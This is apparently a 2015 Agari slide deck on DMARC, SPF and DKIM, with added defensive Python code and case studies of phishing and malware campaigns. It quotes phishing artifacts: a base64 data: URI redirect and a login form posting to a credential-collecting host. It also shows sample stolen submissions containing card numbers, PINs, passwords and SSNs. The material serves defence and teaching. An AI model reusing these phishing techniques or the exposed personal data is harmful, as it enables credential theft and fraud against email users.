© 2015 Agari
About your speaker: John Wilson
● Employee #4 at Agari
● Field CTO
● Managed JP Morgan Chase's implementation of DMARC
● Personally involved in the 2013 Citadel takedown effort
● Previous roles:
- CTO of Brandmail Solutions, Concurro, and 365 Media
- Director, Strategic Projects at SAP
About Agari
Agari secures email as a primary channel of digital engagement, eliminating brand abuse and consumer fraud.
● DMARC pioneer with PayPal, Google & Yahoo!
● DMARC is the only open email standard that protects brands & consumers from fraud
● Founder & CEO Patrick Peterson built SenderBase at IronPort, the first email reputation service
● Engineering & Data Science team = deep security heritage (IronPort, Cisco, Proofpoint, FireEye…)
Agenda
• The Road to DMARC
• Technical Overview of SPF, DKIM, and DMARC
• Practical Examples & War Stories
• Q & A
Email Arms Race

Defense: IP reputation - SenderBase (Cisco), SenderScore (Return Path), blacklists (SORBS, SpamHaus)
Attacker response: Compromise a "good" server

Defense: Content filtering - words/word combinations, virus scanning, URL scanning, fingerprinting
Attacker response: Obfuscation ("Vi@gra", HTML); modify the binary until it isn't detected; URL shorteners and redirectors; varying subjects & content; appending random blocks of text

Defense: Spamtraps
Attacker response: Use real addresses - captured in a breach, harvested from an address book
October 5, 2007: The PayPal/Yahoo Experiment
Idea: Ask Yahoo to block non-authenticating paypal.com messages.
Challenge: How to ensure SPF and DomainKeys are properly configured and working as expected?
- Yahoo supported PayPal with metadata about all paypal.com email, including SPF/DK status
- PayPal used the data to perfect SPF/DK
- The experiment proved that blocking messages based on email authentication failures was highly effective at preventing exact-domain phishing
DMARC lets Everyone in on the Fun
● The DMARC standard adds enforceable policy and a feedback loop to SPF & DKIM to combat spoofed email, standardizing an effective solution at internet scale
● Email receivers have adopted DMARC – senders can leverage the standard to eliminate phishing, restore consumer trust and allow targeted tracking of abuse
(Figure: DMARC receivers, DMARC participants, DMARC.org participants)
SPF: Sender Policy Framework
SPF Record for apple.com:
SPF authenticates the Envelope Domain
SPF breaks when messages are relayed/auto-forwarded
DKIM: DomainKeys Identified Mail
DKIM is based on a cryptographic signature that is applied by the sending mail server. The signature is added as a special message header:
The signing domain and the "selector" are used by the receiving mail server to locate the public key record in DNS.
The public key is then used to verify the signature. If the signature verifies, we know that the signed headers and message body weren't modified after signing.
SPF:
- Authenticates the network path
- Authorized servers published via DNS
- Very low operational cost
- Envelope / From header alignment required
DKIM:
- Authenticates the message header/body
- Public keys published in DNS
- Requires a digital signature on each outbound message
- Signing / From header alignment required
DMARC Adds the Policy Layer to DKIM & SPF
POLICY: Senders declare how to process unauthenticated messages
VISIBILITY: Receivers provide feedback on messages failing authentication
(Diagram: DMARC layered on top of DKIM and SPF)
DMARC Record examples
Monitor policy example:
Quarantine policy example:
Reject policy example:
DMARC Forensic Feedback Example
Full Message Example (hotmail.com, outlook.com, etc.):
Typical DMARC Policy Enforcement Flow

Incoming message:
From: [email protected]
Subject: Urgent Alert!

Do SPF or DKIM prove this message was sent by example.com?
  Yes -> Is the content OK?
  No  -> What is example.com's DMARC policy? (none / quarantine / reject)
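The DKIM key lookup, the SPF/DKIM alignment rules, the DMARC record tags and the enforcement flow above, worked through in code. This is an added example, not Agari's or any receiver's implementation: the DKIM-Signature header, the DMARC records and the message scenarios are constructed, and the organizational-domain check is simplified to the last two labels (real receivers consult the Public Suffix List).

```python
# Added example: DKIM key location, alignment and the DMARC enforcement flow.
# Every input below is constructed; nothing here is taken from a real domain.

def parse_tags(value):
    """Parse a 'tag=value; tag=value' list (DKIM-Signature value or DMARC record)."""
    tags = {}
    for part in value.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            tags[key.strip()] = val.strip()
    return tags

def dkim_key_name(header):
    """DNS name of the public key record: <selector>._domainkey.<signing domain>."""
    _, value = header.split(":", 1)          # drop the 'DKIM-Signature' header name
    tags = parse_tags(value)
    return f"{tags['s']}._domainkey.{tags['d']}"

def org_domain(domain):
    # Simplification (assumption): organizational domain = last two labels.
    # Real receivers use the Public Suffix List so that co.uk etc. work.
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])

def aligned(auth_domain, from_domain, mode):
    """'s' = strict (exact match), 'r' = relaxed (same organizational domain)."""
    if auth_domain is None:
        return False
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)

def dmarc_disposition(record, from_domain, spf_pass_domain, dkim_pass_domain):
    """Mirror the flowchart. spf_pass_domain = envelope domain if SPF passed,
    dkim_pass_domain = d= of a verifying signature; None means that check
    failed. Returns 'pass' (go on to content filtering) or the From domain's
    policy for unauthenticated mail ('none', 'quarantine' or 'reject')."""
    tags = parse_tags(record)
    spf_ok = aligned(spf_pass_domain, from_domain, tags.get("aspf", "r"))
    dkim_ok = aligned(dkim_pass_domain, from_domain, tags.get("adkim", "r"))
    if spf_ok or dkim_ok:
        return "pass"
    return tags.get("p", "none")

# Constructed sample inputs (not from the slides).
DKIM_HEADER = ("DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=sel2015;"
               " h=from:subject:date; bh=<body-hash>; b=<signature>")
RECORD_NONE = "v=DMARC1; p=none; rua=mailto:[email protected]"
RECORD_REJECT = "v=DMARC1; p=reject; aspf=s; adkim=s; ruf=mailto:[email protected]"
```

The forwarding case from the SPF slide is the scenario with `spf_pass_domain=None` and a surviving DKIM signature: DMARC still passes because either mechanism suffices.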
Limitations
- DMARC does not solve the "Friendly From" problem:
  From: PayPal Security <[email protected]>
  - Inbox differentiation may help here
- If your mail provider doesn't support DMARC, the bad stuff still gets through
  - This is an ever-decreasing pool
  - Herd immunity
Sophisticated Phish

<script type="text/javascript">
window.location.href = "data:text/html;charset=utf-8;base64,PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3AgDQogICANCiAgICAgDQogICAgIA0KICAgDQoNCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSIiPg0KPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IiI… LOTS OF STUFF REMOVED …%3D"
</script>

The data: URI scheme is defined in RFC 2397.
Sophisticated Phish

<form id="frmLogin" name="frmLogin" method="post" action="http://e549a200372db9f3fcfac9f384e4ac2d.verifyinfo.net/end.php" class="validationName:(login) validate:()" autocomplete="off" enctype="application/x-www-form-urlencoded">

The host collecting the phished data is e549a200372db9f3fcfac9f384e4ac2d.verifyinfo.net.
But… you can't simply scan the email to find the phishing site.
The end.php script didn't contain any branding, so an automated scan wouldn't necessarily detect it as a phishing site.
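A gateway-side check for the two slides above: decode the base64 data:text/html redirect that hides the page from a body scan, then pull the form action hosts out of the decoded page so the collector can be blocked or reported. This is an added example, not Agari's code; the hidden page and the collector host name are constructed.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Base64-encoded data:text/html URIs, the form the redirect on the slide takes.
DATA_URI_RE = re.compile(r"data:text/html[^,\"']*;base64,([A-Za-z0-9+/=%]+)", re.I)

def decode_data_uris(html):
    """Decode every base64 data:text/html URI found in the markup; tolerates
    percent-encoded ('%3D') or stripped padding."""
    pages = []
    for match in DATA_URI_RE.finditer(html):
        blob = unquote(match.group(1))
        blob += "=" * (-len(blob) % 4)
        try:
            pages.append(base64.b64decode(blob).decode("utf-8", "replace"))
        except ValueError:
            continue  # not valid base64: leave it for other detectors
    return pages

class FormActionParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions = []
    def handle_starttag(self, tag, attrs):
        if tag == "form" and dict(attrs).get("action"):
            self.actions.append(dict(attrs)["action"])

def collector_hosts(email_html):
    """Hosts that forms inside the hidden page post to: the real phishing
    endpoint, which a scan of the raw email body never sees."""
    hosts = []
    for page in decode_data_uris(email_html):
        parser = FormActionParser()
        parser.feed(page)
        for action in parser.actions:
            host = urlsplit(action).hostname
            if host:
                hosts.append(host)
    return hosts

# Constructed sample (not the slide's payload): a login form posting to a
# collector host, hidden in a data: URI the way the slide describes.
HIDDEN_PAGE = ('<html><body><form id="frmLogin" method="post" action='
               '"http://0123456789abcdef.collector.example/end.php">'
               '<input name="user"><input name="pass"></form></body></html>')
SAMPLE_EMAIL_HTML = ('<script type="text/javascript">window.location.href = '
                     '"data:text/html;charset=utf-8;base64,'
                     + base64.b64encode(HIDDEN_PAGE.encode()).decode() + '";</script>')
```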
Would you like some malware with your phish?
At this point, the phishing page tried to download a malicious program posing as a Java update.
Detecting Yesterday's Threats Today!
Here's a sample message containing a malicious attachment posing as a voicemail message. The attack ran from 8am – 10am UTC on February 26th, 2015.
Detecting Yesterday's Threats Today!
Here we see an email-based malware attack launched on February 26, 2015. On the 26th, VirusTotal showed a 0/57 detection rate!
This is my ESET signature update for February 27th, 2015, which now detects Win32/Dridex.K, the malware variant sent in the February 26th campaign.
What a difference a day makes!
Case Study: A Global Logistics Company
On April 10 – 18, 2014, criminals attempted to use a global logistics company's domain to send a malicious email containing a malware attachment. The attack ran in 3 waves. Wave 1 used the same subject line, while waves 2 & 3 used different shipment numbers.
Wave 1: 50,120 hosts
Wave 2: 34,877 hosts
Wave 3: 29,670 hosts
Case Study: A Global Logistics Company
On April 10 – 18, criminals attempted to use ups.com to send a malicious email containing a malware attachment. The attack ran in 3 waves. Wave 1 used the same subject line, while waves 2 & 3 used different shipment numbers.
Wave 1: 50,120 hosts
Wave 2: 34,877 hosts
Wave 3: 29,670 hosts
Attack Host Overlap*
(Venn diagram of the hosts used in Wave 1, Wave 2 and Wave 3; the region counts shown are 2,996; 5,576; 2,100; 1,480; 18,860; 10,784 and 11,618)
* Not including known relays
Send them Packing
50-100M fraudulent messages daily
Sent from t.co domain
DMARC reject policy published March 13, 2013
Abuse stopped completely 2 days later
Twitter was able to redeploy dozens of resources
Not the Sharpest Tool in the Shed

From: [email protected]
Subject: Form Submission
Disposition: REJECT
Source IP: 34.56.2.7
----------
fname: Joe
lname: Smith
cardn: 1432234202341232
pin: 2198
phone: 2125551523
addr1: 172 W. 48th St.
addr2: apt. 12
city: New York
state: NY
zip: 10036
email: [email protected]
username: jsmith74
password: colgateBS95
ssn: 034-21-9987

From: [email protected]
Subject: Form Submission
Disposition: REJECT
Source IP: 34.56.2.7
----------
fname: Samuel
lname: Burroughs
cardn: 1432872198722443
pin: 8871
phone: 7162321023
addr1: 41 Pullman Ave.
addr2:
city: Rochester
state: NY
zip: 14615
email: [email protected]
username: samthepianoman
password: 11fingers
ssn: 414-54-0082

From: [email protected]
Subject: Form Submission
Disposition: REJECT
Source IP: 34.56.2.7
----------
fname: Raj
lname: Venkatasubramanian
cardn: 1432399864365132
pin: 3388
phone: 4089761023
addr1: 341 Kenmore Avenue
addr2:
city: Sunnyvale
state: CA
zip: 94086
email: [email protected]
username: rvenkat88
password: #shilpa$
ssn: 997-29-2101

14,000+ total submissions
~ 80% appeared to be real credentials
1. DMARC prevented delivery to the criminal
2. We knew the criminal's email address
3. We knew the gullible bank clients
Twitter Investigates (And Takes Action!)
1. Which accounts created the batch of t.co URLs?
2. What IP addresses were used to create those accounts?
3. What other accounts were created from those IP addresses?
4. Twitter removes the 1,600 t.co URLs
5. Twitter kills more than 20K user accounts
Citadel Botnet Takedown: Agari's Role
• Provided intelligence on the Citadel root cause - phishing emails with malicious URLs using web exploits for Citadel malware installation
– Data must be provided at Internet scale and in real time
• Leveraged data on fraudulent email purporting to be from seven FS-ISAC members sent to ~1B consumer mailboxes
• Submitted data on 3,762,605 emails from 4 March – 19 April 2013 to Microsoft's Digital Crimes Unit for analysis – 40% phish, 60% malware (Source: Microsoft)
(Figures: Malicious Message Example 1, Malicious Message Example 2)
Data Flow: From Spam to Intelligence
1. Criminals send spoofed messages purporting to be from FS-ISAC members.
2. Receivers send forensic copies of the spoofed messages to Agari for analysis.
3. Agari sends forensic analysis to the Microsoft DCU for further analysis and correlation with additional data.
Filtering for Relevant Information
- Filter for messages based on member domain, header information, authentication fails, server origination
- Find matching messages, extract URLs, validate owned & safe URLs, create tuples for the remaining URLs
Map Showing a Single Day's Worth of Data
22,245 sources of spoofed messages purporting to be from participating FS-ISAC member domains, April 6, 2013
Agari Supported Microsoft as a Declarant
• Agari provided a declaration in support of the TRO, Seizure Order, and Order to Show Cause
Resources
John Wilson (Happy to answer questions, present to your team, etc.)
Agari (Free DMARC resources)
http://agari.com/tools/
DMARC.org (You can find the specification here!)
http://www.dmarc.org
DMARC Receivers

Provider                                              Mailboxes    Data  Enforcement  Msg Level
Yahoo!                                                320 Million  ✔     ✔            ✔*
AT&T (via Yahoo)                                      8 Million    ✔     ✔            ✔*
Rogers Communications (via Yahoo)                     10 Million   ✔     ✔            ✔*
Verizon (via Yahoo)                                   6 Million    ✔     ✔            ✔*
Xtra, SBC, Ameritech, and additional Y! partners      20 Million   ✔     ✔            ✔*
Google (including 4.6M Apps domains)                  425 Million  ✔     ✔            soon?
Microsoft (Hotmail, Live.com, Outlook.com, MSN)       380 Million  ✔     ✔            ✔
AOL                                                   50 Million   ✔     ✔            2014
Comcast                                               20 Million   ✔     ✔
NetEase (163.com, 126.com, yeah.net)                  510 Million  ✔     ✔            ✔**
xs4all.nl                                             1 Million    ✔     ✔
Mail.ru                                               300 Million  ✔     ✔
Yandex                                                200 Million  ✔
LinkedIn                                              -            ✔     ✔            ✔
Facebook                                              800 Million  ✔
iCloud                                                ?            2015  2015
Mercury.net (including 177 customer domains)          ?            ✔

* URLs only; via private channel
** Full body available upon request
Soon you too can be a DMARC Receiver!

Open Source                        Status
Sendmail (via OpenDMARC)           production
Postfix (via OpenDMARC)            production

Commercial                         Status
Google Apps                        production
Cisco/IronPort                     production
Proofpoint                         Summer 2015
Microsoft Office 365               Spring 2015
Symantec Cloud                     production
Message Systems (via OpenDMARC)    production